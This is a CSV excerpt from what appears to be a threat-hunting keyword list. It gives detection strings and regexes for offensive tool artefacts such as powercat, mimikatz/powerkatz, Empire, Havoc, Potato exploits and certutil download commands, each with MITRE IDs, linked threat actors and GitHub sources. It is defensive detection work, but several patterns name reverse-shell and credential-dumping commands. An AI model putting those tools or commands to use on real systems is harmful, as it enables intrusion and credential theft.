"*PostMulitMsfGetDomainInfoByBloodHound.py*",".{0,1000}PostMulitMsfGetDomainInfoByBloodHound\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55119"
"*PostPowershellPowerViewAddNetUser.py*",".{0,1000}PostPowershellPowerViewAddNetUser\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55120"
"*PostPowershellPowerViewGetNetGroup.py*",".{0,1000}PostPowershellPowerViewGetNetGroup\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55121"
"*PostPowershellPowerViewGetNetGroupMember.py*",".{0,1000}PostPowershellPowerViewGetNetGroupMember\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55122"
"*PostPowershellPowerViewGetNetProcess.py*",".{0,1000}PostPowershellPowerViewGetNetProcess\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55123"
"*PostPowershellPowerViewUserHunter.py*",".{0,1000}PostPowershellPowerViewUserHunter\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55124"
"*postrequest/link.git*",".{0,1000}postrequest\/link\.git.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","55125"
"*PostRewMsfAuxiliaryCVE*.py*",".{0,1000}PostRewMsfAuxiliaryCVE.{0,1000}\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55126"
"*PostRewMsfExample.py*",".{0,1000}PostRewMsfExample\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55127"
"*PostRewMsfPostConfInfos.py*",".{0,1000}PostRewMsfPostConfInfos\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55128"
"*potato.exe -ip *",".{0,1000}potato\.exe\s\-ip\s.{0,1000}","offensive_tool_keyword","potato","Potato Privilege Escalation on Windows","T1134.001 - T1068  - T1055 - T1546.015","TA0004","N/A","N/A","Privilege Escalation","https://github.com/foxglovesec/Potato","1","0","N/A","N/A","7","8","721","165","2021-01-16T20:34:04Z","2016-02-09T11:28:17Z","55129"
"*PotatoAPI.Mode.DCOMRemote*",".{0,1000}PotatoAPI\.Mode\.DCOMRemote.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","55130"
"*PotatoTrigger.cpp*",".{0,1000}PotatoTrigger\.cpp.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","55131"
"*PowerBreach.ps1*",".{0,1000}PowerBreach\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerBreach.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55134"
"*PowerBruteLogon.*",".{0,1000}PowerBruteLogon\..{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","8","2","124","22","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z","55135"
"*PowerBruteLogon.zip*",".{0,1000}PowerBruteLogon\.zip.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","8","2","124","22","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z","55136"
"*powercat -c *",".{0,1000}powercat\s\-c\s.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","55137"
"*powercat -c * -p *",".{0,1000}powercat\s\-c\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","0","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","55138"
"*powercat -l *",".{0,1000}powercat\s\-l\s.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","55139"
"*powercat -l -p 4444*",".{0,1000}powercat\s\-l\s\-p\s4444.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","0","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","55140"
"*Powercat.ps1*",".{0,1000}Powercat\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","55141"
"*powerdump.ps1*",".{0,1000}powerdump\.ps1.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","378","79","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z","55142"
"*powerdump.ps1*",".{0,1000}powerdump\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55143"
"*powerdump.rb*",".{0,1000}powerdump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55144"
"*PowerExtract-main.zip*",".{0,1000}PowerExtract\-main\.zip.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","N/A","2","117","14","2025-03-28T10:49:43Z","2021-12-11T15:24:44Z","55145"
"*PowerForensics*",".{0,1000}PowerForensics.{0,1000}","offensive_tool_keyword","PowerForensics","The purpose of PowerForensics is to provide an all inclusive framework for hard drive forensic analysis. PowerForensics currently supports NTFS and FAT file systems. and work has begun on Extended File System and HFS+ support.","T1003 - T1039 - T1046 - T1057","TA0005 - TA0007 - TA0010","N/A","N/A","Reconnaissance","https://github.com/Invoke-IR/PowerForensics","1","1","N/A","N/A","N/A","10","1398","275","2023-11-16T10:31:37Z","2015-03-07T17:12:19Z","55146"
"*powerglot.py*",".{0,1000}powerglot\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","55147"
"*powerkatz.dll*",".{0,1000}powerkatz\.dll.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","55148"
"*powerkatz.dll*",".{0,1000}powerkatz\.dll.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","https://www.virustotal.com/gui/file-analysis/YjU2NjE0YjBiOGNlMzNhZDVlYzRhYWFkMjJhNzQ4ZGQ6MTcyNDUyMDQ0Mw==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55149"
"*powerkatz_x64.dll*",".{0,1000}powerkatz_x64\.dll.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","55150"
"*powerkatz_x86.dll*",".{0,1000}powerkatz_x86\.dll.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","55151"
"*PowerLessShell*",".{0,1000}PowerLessShell.{0,1000}","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","N/A","10","1498","256","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z","55152"
"*PowerLessShell.py*",".{0,1000}PowerLessShell\.py.{0,1000}","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","N/A","10","1498","256","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z","55153"
"*powermad.ps1*",".{0,1000}powermad\.ps1.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","N/A","10","1303","181","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z","55154"
"*Powermad.psd1*",".{0,1000}Powermad\.psd1.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","N/A","10","1303","181","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z","55155"
"*Powermad.psm1*",".{0,1000}Powermad\.psm1.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","N/A","10","1303","181","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z","55156"
"*Powermad-master*",".{0,1000}Powermad\-master.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","N/A","10","1303","181","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z","55157"
"*PowerMemory*",".{0,1000}PowerMemory.{0,1000}","offensive_tool_keyword","PowerMemory","Exploit the credentials present in files and memory","T1003 - T1555 - T1213 - T1558","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/giMini/PowerMemory","1","0","N/A","N/A","N/A","9","840","204","2023-05-25T17:58:53Z","2015-08-29T17:09:23Z","55158"
"*powerpick certutil.exe -urlcache -split -f *",".{0,1000}powerpick\scertutil\.exe\s\-urlcache\s\-split\s\-f\s.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","55159"
"*powerpick -Command *",".{0,1000}powerpick\s\-Command\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","55160"
"*powerpick Get-*",".{0,1000}powerpick\sGet\-.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","55161"
"*powerpick.py*",".{0,1000}powerpick\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","55162"
"*PowerPick.x64.dll*",".{0,1000}PowerPick\.x64\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","55163"
"*Powerpreter.psm1*",".{0,1000}Powerpreter\.psm1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","55164"
"*Powerpreter.psm1*",".{0,1000}Powerpreter\.psm1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","55165"
"*powerpreter.psm1*",".{0,1000}powerpreter\.psm1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","55166"
"*powerpwn.powerdump*",".{0,1000}powerpwn\.powerdump.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","0","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","55167"
"*powerpwn_tests*",".{0,1000}powerpwn_tests.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","0","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","55168"
"*power-pwn-main*",".{0,1000}power\-pwn\-main.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","55169"
"*PowerSCCM.ps1*",".{0,1000}PowerSCCM\.ps1.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tool","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","N/A","8","4","354","106","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z","55170"
"*PowerSCCM.psd1*",".{0,1000}PowerSCCM\.psd1.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tool","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","N/A","8","4","354","106","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z","55171"
